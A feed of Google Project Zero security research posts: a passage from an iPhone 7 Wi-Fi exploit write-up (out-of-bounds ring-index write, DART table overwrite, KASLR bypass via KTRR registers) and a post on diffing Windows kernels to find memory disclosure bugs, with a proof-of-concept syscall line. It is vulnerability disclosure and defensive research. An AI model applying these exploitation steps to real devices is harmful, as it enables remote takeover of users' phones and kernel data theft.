When fetching the ring indices, the getIndices function attempts to validate their values to ensure that they do not exceed the allowed ranges. This is undoubtedly a good idea, as it prevents corrupted values from being utilised (which may result in memory corruption).
However, instead of comparing the indices against the current ring’s capacity, they are compared against a fixed maximal value: 0x10000. While this value is certainly an upper bound on the rings’ capacities, it is far from a tight bound (in fact, most rings only hold several hundred items at-most).
Therefore, observing the code above we reach two immediate conclusions. First, if we were to attempt a race condition whereby the ring index is modified to a value larger than the fixed bound (0x10000), we run the risk of triggering a kernel panic should the race attempt fail (line 18). More importantly, however, modifying the write index to any value below the fixed bound (but still above the actual ring’s bounds), will allow us to pass the validations above, resulting in an out-of-bounds write with no race-condition required.
Using the above primitive, we can target any H2D ring, causing the next element to be reliably inserted at an out-of-bounds address within the kernel’s VAS! While the affected range is limited to the ring’s item size multiplied by the aforementioned fixed bound, as we’ll see later on, that’s more than enough.
Triggering the Primitive
Before pressing on, it’s important that we prove that the scenario above is indeed feasible. After all, many components within the kernel might utilise the modified ring indices, which, in turn, may enforce their own validations.
To do so, we’ll perform a short experiment using our research platform. First, we’ll select an H2D ring, and fetch its corresponding object within the kernel. Using the aforementioned object, we can then locate the ring’s base address, allowing us to inspect its contents. Now, we’ll modify the ring indices by utilising the firmware’s DMA engine, while concurrently monitoring the kernel virtual address at the targeted offset for modification. If the primitive is triggered successfully, we should expect an item to be inserted at the target offset from the ring’s base address.
However, running the above experiment results in a resounding failure! Every attempt to trigger the out-of-bounds write results in a kernel panic, thereby crashing the device. Inspecting the panic logs reveals the source of this crash:

It appears that when executing our attack, the firmware attempts to perform a DMA read operation from an address beyond its IO-Space mapped ranges! Taking a moment to reflect on this, the source of the error is immediately apparent: since both the firmware and the host share the ring indices through IO-Space, modifying the aforementioned values affects not only the host, but also the firmware’s implementation of the MSGBUF protocol.
Namely, the firmware attempts to read the ring’s contents using the corrupted indices, resulting in an out-of-bounds access to IO-Space, triggering the above panic.
As we have control over the firmware, we could simply try to intercept the corresponding code paths in its MSGBUF implementation, thus preventing it from issuing the malformed DMA request. Unfortunately, this approach is easier said than done - the firmware’s implementation of MSGBUF is woven into many code-paths in both the ROM and RAM; attempting to patch-out each part results in either breakage of a different component, or in undesired side-effects.
Instead of addressing the sources of the DMA transfers, we’ll go straight to the target -- the engine itself. Recall that each DMA engine on the firmware is accessible through an instance of a single structure (dma_info). Changing the DMA engine’s backplane register pointers within the dma_info structure would mean that while the calling code-paths are able to continue issuing malformed DMA requests, the requests themselves are never actually received by the DMA engine, thus preventing us from triggering a fault.

Indeed, incorporating the above patch into our vulnerability trigger, we can now freely modify the ring indices without inducing a crash. Furthermore, inspecting the corresponding kernel virtual at the targeted index, we can see that our overwrite is finally successful!Devising An Exploit Plan
Having concluded that the primitive is usable, we can now proceed to the next stage -- devising an exploit plan. Namely, we must decide on a data structure to target using the exploit primitive, which may allow us to either modify the kernel’s behaviour, or otherwise gain a useful primitive bringing us closer to that goal.
So which data structure should we target? As we do not have any visibility into the kernel’s address space, reliably locating structures within the kernel presents quite a challenge. What’s more, our primitive only allows limited control over the written content (namely, the data written by the host is an H2D ring item). On top of that, each OOB element can only be written at offsets which are multiples of the ring’s item size, thus introducing alignment constraints.
The above limitations make reliable exploitation rather difficult. Alas, if only there were a data structure whose internal composition were relatively flexible, and to which a single modification would grant us complete control over the host…
...But of course, we’ve already come across the perfect target -- DART’s translation tables!
Recall that DART’s translation tables govern over the mapping between IO-Space and the host’s physical address space. If we were able to use our primitive in order to modify the tables, we might be able to introduce new mappings into IO-Space, pointing at arbitrary physical ranges within the host’s PAS. Mapping in arbitrary physical memory into the Wi-Fi chip is a nearly ideal primitive, as it would allow the chip to modify any data structure used by the kernel, leading to trivial code execution.
In order to successfully carry out such an attack, we must first figure out whether DART’s translation tables indeed constitute valid targets for the vulnerability primitive. Namely, we must figure out whether they reside within the primitive’s scope of influence.
However, scanning through the memory ranges within the primitive’s scope, we quickly come to the realisation that the placement of objects following the message rings is highly variable. Indeed, each device reboot yield an entirely different layout, thus preventing us from relying on any particular object being placed at any given offset from a message ring.
Perhaps we’re out of luck…?Shaping IO-Space
...Instead of relying of lucky placement of nearby objects, let’s take matters into our own hands.
In order to place a DART translation table within the primitive’s scope, we’d need to either move a translation table into the primitive’s scope, or to move one of the message rings, thus shifting the primitive’s scope across different regions of the kernel’s memory.
The former approach seems infeasible; DART’s translation tables are only allocated when the IO-Space mappings are first populated (namely, when the Wi-Fi chip is first initialised). Once the mapping is complete, all of DART’s translation tables remain in their fixed positions within the kernel’s VAS.
But what about moving the rings? While control rings are immovable, a second set of ring exists -- “flow rings”. Flow rings are H2D rings used to facilitate the transfer of outgoing (TX) traffic. They do not carry the traffic itself, but rather notify the device of the transmitted frame’s metadata (including the IO-Space address at which its actual content is stored).
Unlike control rings, flow rings are far more “flexible”. Individual flows are dynamically added and removed as the need arises, by sending a corresponding control message from the host to the device. Each flow is identified by its endpoints (source and destination MAC), their encompassed protocol (i.e., EtherType), and their “priority”.
Perhaps we can use this dynamic nature of flow rings to our advantage. For example, if we were to delete a flow ring, it might subsequently get re-allocated at a different location in the kernel’s memory, thus shifting the scope of our OOB primitive to a possibly more “interesting” patch of objects.
Normally, deleting a flow ring is a two way process; the host sends a deletion request, which is subsequently met by a corresponding message from the device, signalling a successful deletion. However, inspecting the host’s implementation of the above messages, it appears we can just as well skip the first half of the exchange, and send an unsolicited deletion response from the device:
1.  uint32_t AppleBCMWLANBusPCIeInterface::completeFlowRingDeleteResponseMsg(2.                uint64_t unused, struct tx_flowring_delete_response_t* msg) {
3.   4.      //Is the ring ID within bounds?
5.      if (msg->flow_ring_id < this->min_flow ||6.          msg->flow_ring_id >= this->max_flow) {7.          ...8.      }9.      //Does a flow ring exist at the given index? 10.     else if (this->flow_rings[msg->flow_ring_id]) {11.         this->deleteFlowCallback(msg->status, msg->flow_ring_id);12.         ...13.         return 0;14.     }15.     else {16.         ...17.         return 0xE00002BC;18.     }19. } function 0xFFFFFFF006D2FD44
Doing so causes an interesting side-effect to occur: instead of completely deleting the ring, the host decrements a single reference count on the ring object, which is insufficient to bring down the total count to zero (the missing release was meant to be performed by the code responsible for sending the deletion request in the first place).
Consequently, the flow ring is left mapped into IO-Space, but is unusable by the host. As such, newly allocated flow rings cannot inhabit the same IO-Space range (as it remains occupied by the unusable ring), and must instead be carved from higher IO-Space addresses.
This primitive has several interesting side-effects.
For starters, it allows us to re-allocate flow rings, thus moving around their base addresses within the kernel’s VAS, recasting the net over potentially interesting objects within the kernel.
More importantly, however, this primitive allows us to force the allocation of a brand new DART L2 translation table. Since each L2 translation table can only map a fixed range into IO-Space, by continuously leaking flow rings we are able to exhaust the available space in the L2 table, thereby forcing DART to allocate a new table from which the next IO-Space addresses are carved.
Lastly, as luck would have it, since both the rings themselves and DART’s translation tables are carved using the same allocator (IOMalloc), and have similar sizes, they are both carved from the same “zone” of memory. Therefore, by continuously leaking IO-Space addresses and creating new flow rings until a new DART L2 translation table is formed, we can guarantee that the new table will be placed in close proximity to the following flow ring, thereby placing the L2 translation table within our primitive’s scope!

Putting it all together, we can finally reach a reliable placement of DART translation tables in close proximity to a flow ring, thereby allowing us to overwrite entries in the translation tables with flow ring items.Flow Ring Items vs. DART Descriptors
To understand whether flow ring items make good candidates to overwrite DART descriptors, let’s take a moment to inspect their structure. As these items are present in the same form in the Android driver, we are spared the need to reverse-engineer them:
So how does the above structure relate to a DART descriptor?
As the above structure has a 64-bit aligned size, and ring items are always placed in increments of the same size, we can deduce that each quadword in the above structure will reside in a 64-bit aligned address. Similarly, DART descriptors are 64-bits wide, and are placed in 64-bit aligned addresses. Therefore, each aligned quadword in the above structure serves as a potential candidate for replacing a DART descriptor.
However, going over the above quadwords, it is quickly apparent that no fully-controlled word exists within the structure. Indeed, the first and last word are composed of mostly constant values, whereas the third and fourth contain IO-Space addresses (whose forms are incompatible with DART descriptors). Nonetheless, taking a closer look, it appears that the second word is at least somewhat malleable. Its lower six bytes are governed by the destination MAC address to which the frame is being transmitted, while the two upper bytes contain the beginning of our source MAC.
Assuming we could cause the host to send frames to a MAC address of our choosing, that would grant us control over the lower six bytes. However, the remaining two bytes are populated using our device’s MAC address, a much harder target for modification...Spoofing The Source MAC?
To understand whether we can indeed modify the device’s MAC address, let’s take a closer look at the mechanisms through which the MAC address may be programmable on the Wi-Fi chip.
Like many production devices, Broadcom’s Wi-Fi chips allow the storage of chip-specific configuration using one of two mechanisms; either by using a block of Serial Programmable ROM (SPROM) or by utilising a set of One Time Programmable (OTP) fuses. The Wi-Fi chip present on the iPhone 7 uses the latter mechanism.
As for the host, it stores the Wi-Fi chip’s MAC address in the “device tree” (among many other device-specific properties). The “device tree” is a simple hierarchical representation of hardware components utilised by the platform (much like its Linux counterpart, bearing the same name), allowing consumers within the kernel to easily access (and populate) its nodes.
During the Wi-Fi chip’s initialisation, the AppleBCMWLANCore driver retrieves the contents of the chip’s OTP fuses (using the PCIe BARs), and proceeds to parse them according to the PCMCIA Card Information Structure (CIS) format. Reverse-engineering the parsing functions in the kernel, it is quickly apparent that one tag in particular bears significance with regards to our pursuits.
If a “Function Extension” tag is encountered in the CIS data embedded in the OTP, the kernel will extract the MAC address encapsulated within it, and insert it into the “local-mac-address” node in the device tree, representing the Wi-Fi MAC address!

Extracting the stored OTP contents from the kernel, we can see that no such element is present in the OTP contents to begin with, thus allowing us to insert our own tag without fear of causing a collision:
Wi-Fi Chip OTP
Therefore, to change the MAC address, all we’d need to do is fuse the corresponding bits into the OTP, thus inserting the new CIS tag. However, this is easier said than done. For starters, writing to the OTP is a risky operation, and may result in permanent damage to the chip if done incorrectly. Moreover, as it’s name implies, writing to the OTP is a one-time operation, leaving no room for error. Perhaps we could avoid changing the MAC after all?
After discussing the above situation, my colleague Ian Beer suggested an alternative!
Why not, instead, check if the high-order bits in the DART descriptor are actually being used for the translation process? To test this suggestion, we’ll use the research platform to insert a valid L2 descriptor into DART, with one small caveat -- we’ll change the two upper bytes in the 64-bit descriptor to “corrupted” values. After inserting the mapping, we can simply insert a DMA hook into the firmware, performing a DMA access to the aforementioned address.

Running the experiment above we are greeted with a positive result! Indeed, the upper bytes of the DART descriptor are ignored by the translation process, thus sparing us the need to modify the MAC.Spoofing The Destination MAC
Having confirmed that modifying the source MAC is no longer a barrier, all that remains is to cause the host to send a frame to a crafted MAC address, thus allowing us to control the six significant bytes within our 64-bit word.
Naturally, one way to solicit a response from the host is to transmit an ICMP Echo Request (ping) to it, subsequently triggering a corresponding ICMP Echo Response to be sent in response. While this approach can easily trigger the transmission of frames from the host, it only allows frames to be transmitted to known destinations, but does not offer control over the destination MAC.
To trigger communications to our target MAC, we’ll first launch an ARP Spoofing attack; sending a crafted ping from an arbitrary (unused) IP address, thereby causing the host to send an “ARP Request” querying the MAC address of the crafted IP, to which we’ll respond a response encoding our own MAC address, thus associating the IP address with a crafted MAC value.
However, several problems arise when using this method. First, recall that the MAC address is meant to masquerade as a valid DART L2 Descriptor. As we’ve seen in our analysis of the descriptor formats, every valid L2 descriptor must have the two least-significant bits set. This poses somewhat of a problem for MAC addresses, as their bottom bits bear special significance:

Setting the bottom two bits in the MAC address would indicate that it is a broadcast / multicast address. As we are sending unicast traffic (and are expecting a unicast response), it might be difficult to solicit such responses from the host. Furthermore, any network-resident security devices might inspect the traffic and flag it as suspicious (especially as we are executing a classical ARP spoofing attack). What’s more, the router or access point may refuse to route unicast traffic to a broadcast MAC.
To get around the above limitations, we’ll simply inject the traffic directly from the firmware, without transmitting it over the air. To achieve this goal, we’ve written a small assembly stub that, when executed on the firmware, injects the encapsulated frames directly into the host, as if it were transmitted over the network.
This allows us to inject even potentially malformed traffic that would not have been routable (like unicast traffic from a broadcast MAC). Indeed, after running the ARP spoofing vector with the above mechanism, we are able to solicit responses from the host to our crafted (broadcast) MAC address (XNU does not object to sending unicast traffic to broadcast MACs). Great!

Finally, all the ducks are lined up in a row -- we can solicit traffic to MAC addresses of our choosing (even broadcast MACs), without having to modify the source MAC. Furthermore, we can shape IO-Space in order to force a new DART translation table to be allocated following a flow ring within the kernel’s VAS. Therefore, we can overwrite DART descriptors with our own crafted values, thus introducing new mappings into IO-Space. However, a single question remains -- which physical address should we map into IO-Space?
After all, we still haven’t dealt with the issue of KASLR. As the kernel’s loading addresses, both physical and virtual, are “slid” using a randomised value, we cannot locate physical addresses within the kernel until we uncover the slide’s value. If we cannot reliably locate the kernel’s base address, which physical addresses can we find?
To get around this limitation, we’ll use one more trick! While the host’s physical address space houses the DRAM, in which the kernel and application memory are stored, additional regions of physically addressable content can also be found in the PAS. For instance, hardware registers are mapped into fixed physical addresses, allowing the host to interact with peripherals on the SoC. Among these peripherals is DART itself!
As we’ve previously seen, DART’s translation process is initiated using four “L0 descriptors”. These descriptors are fed into DART’s hardware registers, denoting the base addresses of the translation tables from which the IO-Space translation process begins. If we were to map in DART’s hardware registers into IO-Space, we could either read the descriptors, thus allowing us to locate DART’s translation tables within the physical address space!
It should be noted that although DART’s hardware registers are addressable within the host’s physical address space, it remains unknown why IO-Space mappings should even be allowed to include ranges beyond the DRAM’s bounds. Indeed, it stands to reason that such mappings would be prohibited by the hardware. However, as it happens, no such restriction is enforced - DART freely allows any physical range to be inserted into IO-Space.
Therefore, if we wish to map-in DART’s own hardware registers into IO-Space, all that remains is to locate the physical ranges corresponding to DART’s hardware registers! To do so, we’ll use a combined approach.
First, we’ll use our research platform to extract the DART instance, from which we can subsequently retrieve the kernel VAS pointer corresponding to DART’s hardware registers. Then, using our translation table module, we can proceed to convert the kernel virtual address to its matching physical range. After doing so, we are presented with the following result:

Great! The address is clearly not within the DRAM’s range, hinting that we’re on the right track.
To verify whether this is indeed the correct address, we’ll use a second approach. As we already noted, the device hierarchy is stored within a structure called the “device tree”. Different properties relating to each peripheral, include the addresses of their corresponding hardware registers, are stored as nodes within this tree.
The device tree itself is present in a binary format within the firmware image (encapsulated in an IMG4 container). After extracting the device tree, we are presented with a blob storing the device hierarchy. Although the tree’s format is undocumented, inspecting the binary reveals an extremely simple structure; a fixed header denoting the number of children and entries contained in each node, followed by a fixed-length name, and a variable-length value. I later discovered that Jonathan Levin has similarly reversed this structure, and has written a tool to parse out its contents (albeit for an IMG3 container) -- you can check out his script here.
Regardless, after writing our own python script to parse the device tree, we are presented with the following result:

Ah-ha! We once again find the same physical address, thus concluding that our analysis of DART’s hardware registers is correct.
Putting it all together, we can now utilise our exploit primitive to map the physical address containing DART’s registers into IO-Space. Once mapped, we can proceed to read the hardware registers’ values, including the L0 descriptors. It should be noted that attempting to access the hardware registers from the host requires strict 32-bit load and store operations -- attempting a 64-bit load from the hardware registers results in a garbled value being returned. Curiously, however, DMA-ing to and from the hardware registers from the Wi-Fi chip goes unhindered!

Using the L0 descriptor, we can now extract the physical address of the next translation table in DART’s hierarchy. Then, by repeating the exploit primitive and mapping-in the newly discovered physical address into IO-Space, we can repeat the process, descending down DART’s translation hierarchy until we reach a DART L2 translation table. Thus, using one flow ring, we can bring them all, and in IO-Space bind them.
Once an L2 translation table is located within the physical address space, we can proceed to map it into IO-Space using our exploit primitive one last time, thus inserting DART’s own translation table into IO-Space!
By mapping DART’s translation table into its own IO-Space ranges, we can now utilise DMA access from the Wi-Fi chip in order to freely introduce new mappings into IO-Space (removing the need for the exploit primitive). Thus, gaining full control over the host’s physical memory!

Furthermore, as DART’s translation entries are never cleared, we are guaranteed that once the malicious IO-Space entries are inserted, they remain accessible to the Wi-Fi chip, until the device itself reboots. As such, the exploit process need only occur once in order to introduce a backdoor allowing the Wi-Fi chip to freely access the host’s physical memory.
One curiosity of note is that DART’s has a rather large TLB. Therefore, changes in IO-Space may not immediately be reflected until the entries are evicted from the cache. Nonetheless, this is easily dealt with by mapping in IO-Space addresses in a circular pattern, thus allowing stale entries to get cleared.Finding The KASLR Slide
At long last, we have complete control over the entire physical address space, directly from the Wi-Fi chip. Consequently, we can proceed to map and and modify any physical address we desire, even those corresponding to the kernel’s data structures.
While this form of access is sufficient in order to subvert the kernel, there’s one tiny snag we have yet to deal with: KASLR. Since the kernel’s physical base address is randomised using the KASLR slide, and we have yet to deduce its value, we might have to resort to scanning the DRAM’s physical address ranges until we locate the kernel itself.
This approach is rather inefficient. Instead, we can opt for a more elegant path. Recall that, as we’ve just seen, hardware registers may be freely mapped into IO-Space. As hardware registers are not affected by the KASLR slide (indeed they are mapped at fixed physical addresses), they can be trivially located regardless of the current “slide” value.
Perhaps one of the hardware registers can be used as an oracle to deduce the KASLR slide?
Recall that newer devices, such as the iPhone 7, enforce the integrity of the kernel using a hardware mechanism dubbed “KTRR”. Simply put, this mechanism allows the device to provide “lockdown” regions, to which subsequent modifications are prohibited. These regions are programmed using a special set of hardware registers.

Amusingly, this very same mechanism can be used to deduce the KASLR slide!
By mapping in physical addresses corresponding to the aforementioned hardware registers, we can proceed to read their contents directly from IO-Space. This, in turn, reveals the physical ranges encoded in the “lockdown registers”, which store non other than the kernel’s base address.
The Exploit
Summing up all of the above, we’ve finally written an exploit, allowing full control over the device’s physical memory over-the-air, using Wi-Fi communication alone. You can find the exploit here.
It should be noted that several smaller details have been omitted from the blog post, in the interest of (some) brevity. For instance, locating the offset between the newly allocated DART translation table and the flow ring requires a process of probing various IO-Space addresses, while also guaranteeing that alignment constraints enforced by the granularity of ring item sizes are met. We encourage researchers to read the exploit’s code in order to discover any such omitted parts.
The exploit has been tested against the iPhone 7 running iOS 10.2 (14C92). The vulnerabilities are present in versions of iOS up to (and including) iOS 10.3.3. Researchers wishing to utilise the exploit on different iDevices or different versions, would be required to adjust the symbols used by the exploit.

Upon successful execution, the exploit exposes APIs to read and write the host’s physical memory directly over-the-air, by mapping in any requested address to the controlled DART L2 translation table, and issuing DMA accesses to the corresponding mapped IO-Space addresses.
For convenience sake, the exploit also locates the kernel’s physical base address using the method we described above (using the KTRR read-only region registers), thus allowing researchers to easily explore the kernel’s physical memory ranges.Afterword
Over the course of this series of blog posts, we’ve explored the security of the Wi-Fi stack on Apple devices. Consequently, we constructed a complete exploit chain, allowing attackers to reliably gain control over the iOS kernel on an iPhone 7 using Wi-Fi communication alone.
During our research, we explored several components, including Broadcom’s Wi-Fi firmware, the DART IOMMU, and Apple’s Wi-Fi drivers. Each of the aforementioned components is proprietary, thus requiring substantial effort to gain visibility into their operations. We hope that by providing the tools used to conduct our research, additional exploration of these surfaces will be performed in the future, allowing for their corresponding security postures to be enhanced.
We’ve also seen how the iPhone utilises hardware security mechanisms, such as DART, in order to provide isolation between the host and potentially malicious components. These mechanisms significantly raise the bar for launching successful attacks targeting the host. Nonetheless, additional research into DART is needed in order to explore all facets of its implementation. For instance, while we’ve explored the enacted IO-Space through the prism of the Wi-Fi chip, additional PCIe components exist on the SoC, which are similarly guarded by DARTs. These components remain, as of yet, unexplored.
Apart from fixing individual vulnerabilities in the security boundaries between the host and the Wi-Fi chip, several structural enhancements can be applied to make future exploitation harder. This includes introducing read-only mappings to DART (if they are not already present), clearing unused descriptors from DART’s translation tables upon rebooting the associated component, and preventing IO-Space mappings from exposing physical ranges beyond the DRAM.
Lastly, while memory isolation goes a long way towards defending the host against a rogue Wi-Fi chip, the host must still consider all communications originating from the Wi-Fi chip as potentially malicious. To this end, the numerous communication channels between the two endpoints (including event packets, “ioctls”, and control commands), must be designed to withstand malformed data transmitted by the chip.
Categories: Security

Using Binary Diffing to Discover Windows Kernel Memory Disclosure Bugs

Google Project Zero - Thu, 10/05/2017 - 12:22
Posted by Mateusz Jurczyk of Google Project Zero
Patch diffing is a common technique of comparing two binary builds of the same code – a known-vulnerable one and one containing a security fix. It is often used to determine the technical details behind ambiguously-worded bulletins, and to establish the root causes, attack vectors and potential variants of the vulnerabilities in question. The approach has attracted plenty of research [1][2][3] and tooling development [4][5][6] over the years, and has been shown to be useful for identifying so-called 1-day bugs, which can be exploited against users who are slow to adopt latest security patches. Overall, the risk of post-patch vulnerability exploitation is inevitable for software which can be freely reverse-engineered, and is thus accepted as a natural part of the ecosystem.
In a similar vein, binary diffing can be utilized to discover discrepancies between two or more versions of a single product, if they share the same core code and coexist on the market, but are serviced independently by the vendor. One example of such software is the Windows operating system, which currently has three versions under active support – Windows 7, 8 and 10 [7]. While Windows 7 still has a nearly 50% share on the desktop market at the time of this writing [8], Microsoft is known for introducing a number of structural security improvements and sometimes even ordinary bugfixes only to the most recent Windows platform. This creates a false sense of security for users of the older systems, and leaves them vulnerable to software flaws which can be detected merely by spotting subtle changes in the corresponding code in different versions of Windows.
In this blog post, we will show how a very simple form of binary diffing was effectively used to find instances of 0-day uninitialized kernel memory disclosure to user-mode programs. Bugs of this kind can be a useful link in local privilege escalation exploit chains (e.g. to bypass kernel ASLR), or just plainly expose sensitive data stored in the kernel address space. If you're not familiar with the bug class, we recommend checking the slides of the Bochspwn Reloaded talk given at the REcon and Black Hat USA conferences this year as a prior reading [9].Chasing memset callsMost kernel information disclosures are caused by leaving parts of large memory regions uninitialized before copying them to user-mode; be they structures, unions, arrays or some combination of these constructs. This typically means that the kernel provides a ring-3 program with more output data than there is relevant information, for a number of possible reasons: compiler-inserted padding holes, unused structure/union fields, large fixed-sized arrays used for variable-length content etc. In the end, these bugs are rarely fixed by switching to smaller buffers – more often than not, the original behavior is preserved, with the addition of one extra memset function call which pre-initializes the output memory area so it doesn't contain any leftover stack/heap data. This makes such patches very easy to recognize during reverse engineering.
When filing issue #1267 in the Project Zero bug tracker (Windows Kernel pool memory disclosure in win32k!NtGdiGetGlyphOutline, found by Bochspwn) and performing some cursory analysis, I realized that the bug was only present in Windows 7 and 8, while it had been internally fixed by Microsoft in Windows 10. The figure below shows the obvious difference between the vulnerable and fixed forms of the code, as decompiled by the Hex-Rays plugin and diffed by Diaphora:

Figure 1. A crucial difference in the implementation of win32k!NtGdiGetGlyphOutline in Windows 7 and 10
Considering how evident the patch was in Windows 10 (a completely new memset call in a top-level syscall handler), I suspected there could be other similar issues lurking in the older kernels that have been silently fixed by Microsoft in the more recent ones. To verify this, I decided to compare the number of memset calls in all top-level syscall handlers (i.e. functions starting with the Nt prefix, implemented by both the core kernel and graphical subsystem) between Windows 7 and 10, and later between Windows 8.1 and 10. Since in principle this was a very simple analysis, an adequately simple approach could be used to get sufficient results, which is why I decided to perform the diffing against code listings generated by the IDA Pro disassembler.
When doing so, I quickly found out that each memory zeroing operation found in the kernel is compiled in one of three ways: with a direct call to the memset function, its inlined form implemented with the rep stosd x86 instruction, or an unfolded series of mov x86 instructions:
Figure 2. A direct memset function call to reset memory in nt!NtCreateJobObject (Windows 7)
Figure 3. Inlined memset code used to reset memory in nt!NtRequestPort (Windows 7)
Figure 4. A series of mov instructions used to reset memory in win32k!NtUserRealInternalGetMessage (Windows 8.1)
The two most common cases (memset calls and rep stosd) are both decompiled to regular invocations of memset() by the Hex-Rays decompiler:
Figures 5 and 6. A regular memset call is indistinguishable from an inlined rep movsd construct in the Hex-Rays view
Unfortunately, a sequence of mov's with a zeroed-out register as the source operand is not recognized by Hex-Rays as a memset yet, but the number of such occurrences is relatively low, and hence can be neglected until we manually deal with any resulting false-positives later in the process. In the end, we decided to perform the diffing using decompiled .c files instead of regular assembly, just to make our life a bit easier.
A complete list of steps we followed to arrive at the final outcome is shown below. We repeated them twice, first for Windows 7/10 and then for Windows 8.1/10:

  1. Decompiled ntkrnlpa.exe and win32k.sys from Windows 7 and 8.1 to their .c counterparts with Hex-Rays, and did the same with ntoskrnl.exe, tm.sys, win32kbase.sys and win32kfull.sys from Windows 10.
  2. Extracted a list of kernel functions containing memset references (taking their quantity into account too), and sorted them alphabetically.
  3. Performed a regular textual diff against the two lists, and chose the functions which had more memset references on Windows 10.
  4. Filtered the output of the previous step against the list of functions present in the older kernels (7 or 8.1, again pulled from IDA Pro), to make sure that we didn't include routines which were only introduced in the latest system.

In numbers, we ended up with the following results:

ntoskrnl functionsntoskrnl syscall handlerswin32k functionswin32k syscall handlersWindows 7 vs. 1015388916Windows 8.1 vs. 1012756711Table 1. Number of old functions with new memset usage in Windows 10, relative to previous system editions
Quite intuitively, the Windows 7/10 comparison yielded more differences than the Windows 8.1/10 one, as the system progressively evolved from one version to the next. It's also interesting to see that the graphical subsystem had fewer changes detected in general, but more than the core kernel specifically in the syscall handlers. Once we knew the candidates, we manually investigated each of them in detail, discovering two new vulnerabilities in the win32k!NtGdiGetFontResourceInfoInternalW and win32k!NtGdiEngCreatePalette system services. Both of them were addressed in the September Patch Tuesday, and since they have some unique characteristics, we will discuss each of them in the subsequent sections.win32k!NtGdiGetFontResourceInfoInternalW (CVE-2017-8684)The inconsistent memset which gave away the existence of the bug is as follows:
Figure 8. A new memset added in win32k!NtGdiGetFontResourceInfoInternalW in Windows 10
This was a stack-based kernel memory disclosure of about 0x5c (92) bytes. The structure of the function follows a common optimization scheme used in Windows, where a local buffer located on the stack is used for short syscall outputs, and the pool allocator is only invoked for larger ones. The relevant snippet of pseudocode is shown below:
Figure 9. Optimized memory usage found in the syscall handler
It's interesting to note that even in the vulnerable form of the routine, memory disclosure was only possible when the first (stack) branch was taken, and thus only for requested buffer sizes of up to 0x5c bytes. That's because the dynamic PALLOCMEM pool allocator does zero out the requested memory before returning it to the caller:
Figure 10. PALLOCMEM always resets allocated memory
Furthermore, the issue is also a great example of how another peculiar behavior in interacting with user-mode may contribute to the introduction of a security flaw (see slides 32-33 of the Bochspwn Reloaded deck). The code pattern at fault is as follows:
  1. Allocate a temporary output buffer based on a user-specified size (dubbed a4 in this case), as discussed above.
  2. Have the requested information written to the kernel buffer by calling an internal win32k!GetFontResourceInfoInternalW function.
  3. Write the contents of the entire temporary buffer back to ring-3, regardless of how much data was actually filled out by win32k!GetFontResourceInfoInternalW.

Here, the vulnerable win32k!NtGdiGetFontResourceInfoInternalW handler actually "knows" the length of meaningful data (it is even passed back to the user-mode caller through the 5th syscall parameter), but it still decides to copy the full amount of memory requested by the client, even though it is completely unnecessary for the correct functioning of the syscall:
Figure 11. There are v10 output bytes, but the function copies the full a4 buffer size.
The combination of a lack of buffer pre-initialization and allowing the copying of redundant bytes is what makes this an exploitable security bug. In the proof-of-concept program, we used an undocumented information class 5, which only writes to the first four bytes of the output buffer, leaving the remaining 88 uninitialized and ready to be disclosed to the attacker.win32k!NtGdiEngCreatePalette (CVE-2017-8685)In this case, the vulnerability was fixed in Windows 8 by introducing the following memset into the syscall handler, while still leaving Windows 7 exposed:
Figure 12. A new memset added in win32k!NtGdiEngCreatePalette in Windows 8
The system call in question is responsible for creating a kernel GDI palette object consisting of N 4-byte color entries, for a user-controlled N. Again, a memory usage optimization is employed by the implementation – if N is less or equal to 256 (1024 bytes in total), these items are read from user-mode to a kernel stack buffer using win32k!bSafeReadBits; otherwise, they are just locked in ring-3 memory by calling win32k!bSecureBits. As you can guess, the memory region with the extra memset applied to it is the local buffer used to temporarily store a list of user-defined RGB colors, and it is later passed to win32k!EngCreatePalette to actually create the palette object. The question is, how do we have the buffer remain uninitialized but still passed for the creation of a non-empty palette? The answer lies in the implementation of the win32k!bSafeReadBits routine:
Figure 13. Function body of win32k!bSafeReadBits
As you can see in the decompiled listing above, the function completes successfully without performing any actual work, if either the source or destination pointer is NULL. Here, the source address comes directly from the syscall's 3rd argument, which doesn't undergo any prior sanitization. This means that we can make the syscall think it has successfully captured an array of up to 256 elements from user-mode, while in reality the stack buffer isn't written to at all. This is achieved with the following system call invocation in our proof-of-concept program:
HPALETTE hpal = (HPALETTE)SystemCall32(__NR_NtGdiEngCreatePalette, PAL_INDEXED, 256, NULL, 0.0f, 0.0f, 0.0f);
Once the syscall returns, we receive a handle to the palette which internally stores the leaked stack memory. In order to read it back to our program, one more call to the GetPaletteEntries API is needed. To reiterate the severity of the bug, its exploitation allows an attacker to disclose an entire 1 kB of uninitialized kernel stack memory, which is a very powerful primitive to have in one's arsenal.
In addition to the memory disclosure itself, other interesting quirks can be observed in the nearby code area. If you look closely at the code of win32k!NtGdiEngCreatePalette in Windows 8.1 and 10, you will spot an interesting disparity between them: the stack array is fully reset in both cases, but it's achieved in different ways. On Windows 8.1, the function "manually” sets the first DWORD to 0 and then calls memset() on the remaining 0x3FC bytes, while Windows 10 just plainly memsets the whole 0x400-byte area. The reason for this is quite unclear, and even though the end result is the same, the discrepancy provokes the idea that not just the existence of memset calls can be compared across Windows versions, but also possibly the size operands of those calls.
Figure 14. Different code constructs used to zero out a 256-item array on Windows 8.1 and 10
On a last related note, the win32k!NtGdiEngCreatePalette syscall may be also quite useful for stack spraying purposes during kernel exploitation, as it allows programs to easily write 1024 controlled bytes to a continuous area of the stack. While the buffer size is smaller than what e.g. nt!NtMapUserPhysicalPages has to offer, the buffer itself ends at a higher offset relative to the stack frame of the top-level syscall handler, which can make an important difference in certain scenarios.ConclusionsThe aim of this blog post was to illustrate that security-relevant differences in concurrently supported branches of a single product may be used by malicious actors to pinpoint significant weaknesses or just regular bugs in the more dated versions of said software. Not only does it leave some customers exposed to attacks, but it also visibly reveals what the attack vectors are, which works directly against user security. This is especially true for bug classes with obvious fixes, such as kernel memory disclosure and the added memset calls. The "binary diffing" process discussed in this post was in fact pseudocode-level diffing that didn't require much low-level expertise or knowledge of the operating system internals. It could have been easily used by non-advanced attackers to identify the three mentioned vulnerabilities (CVE-2017-8680, CVE-2017-8684, CVE-2017-8685) with very little effort. We hope that these were some of the very few instances of such "low hanging fruit" being accessible to researchers through diffing, and we encourage software vendors to make sure of it by applying security improvements consistently across all supported versions of their software.References
Categories: Security

Over The Air - Vol. 2, Pt. 2: Exploiting The Wi-Fi Stack on Apple Devices

Google Project Zero - Tue, 10/03/2017 - 12:18
Posted by Gal Beniamini, Project Zero
